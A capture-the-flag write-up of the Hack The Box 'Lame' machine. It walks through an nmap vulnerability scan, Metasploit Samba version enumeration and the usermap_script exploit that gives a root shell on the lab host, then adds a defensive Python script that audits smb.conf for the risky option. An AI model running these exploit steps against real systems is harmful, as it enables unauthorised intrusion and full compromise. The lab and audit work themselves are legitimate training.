Hackthebox – Lame Writeup
Today we are gonna solve the Lame machine from hackthebox. Lame is a Linux machine released on 14 March 2017, and it is rated as an easy machine. We exploit a vulnerability in the SMB service to gain direct root access. Let’s get started.
Connecting to HTB VPN:
1. First download the VPN file from the access page of hackthebox.eu
2. Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
Scanning:
1. Let’s begin by performing an nmap scan of our target at 10.10.10.3
nmap -sV -A -p- --script vuln 10.10.10.3
-sV : to get the service versions on each port
-A : to get information such as OS details, traceroutes, ports etc
-p- : to scan all 65535 ports
--script vuln : to check for most common vulnerabilities
We get the following details from our scan
Enumeration:
1. From the nmap result there is an open SMB port running Samba smbd 3.x
2. But we don’t know the exact version of the service. Metasploit has an auxiliary module to find out SMB versions, so let’s use that
msfconsole
3. Search for smb_version
search smb_version
4. Select the module
use auxiliary/scanner/smb/smb_version
5. View the options needed to be set using the show options command
show options
6. We have to set the rhosts as the remote machine’s IP
set rhosts 10.10.10.3
7. And now we run the module
exploit
8. From the results we see that the SMB port is running Samba 3.0
9. So let’s search Google for exploits on Samba SMB 3.0. After some searching we got to know that there is a Metasploit module called usermap script which can be used to exploit Samba SMB 3.0.
Gaining access:
1. Search for usermap_script
search usermap_script
2. Select our exploit from the list by specifying the path
use exploit/multi/samba/usermap_script
3. View the options needed to be set using the show options command
show options
4. We have to set the rhosts to the remote machine address
set rhosts 10.10.10.3
5. Now let’s exploit the machine
exploit
6. Ta da, we got a meterpreter shell
7. Let’s check who we are on the system
whoami
We are root !!!!
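The usermap_script module used above depends on Samba's non-default "username map script" option in smb.conf. As an added example (not part of the original writeup), this Python sketch audits smb.conf text for that option on a server you administer; the sample configs and script paths are constructed.

```python
import re

# Constructed sample configs (paths are illustrative, not from the target box).
SAMPLE_WEAK = """
[global]
   workgroup = WORKGROUP
   User Name Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAMPLE_OK = """
[global]
   workgroup = WORKGROUP
;  username map script = /etc/samba/scripts/mapusers.sh
"""

def normalize(name):
    # smb.conf names are case-insensitive and whitespace in them is ignored.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Return {section: {normalized_parameter: value}} for smb.conf text."""
    lines, buf = [], ""
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):      # trailing backslash continues the line
            buf += raw.rstrip()[:-1]
            continue
        lines.append(buf + raw)
        buf = ""
    conf, section = {}, "global"  # assumption: settings before any header are global
    for line in map(str.strip, lines):
        if not line or line[0] in "#;":      # blank line or comment
            continue
        header = re.fullmatch(r"\[(.*)\]", line)
        if header:
            section = normalize(header.group(1))
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' is significant
            conf.setdefault(section, {})[normalize(name)] = value.strip()
    return conf

def audit_username_map_script(text):
    """Return the configured script path, or None when the option is unset."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript") or None

if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("ok", SAMPLE_OK)):
        print(label, "->", audit_username_map_script(sample))
```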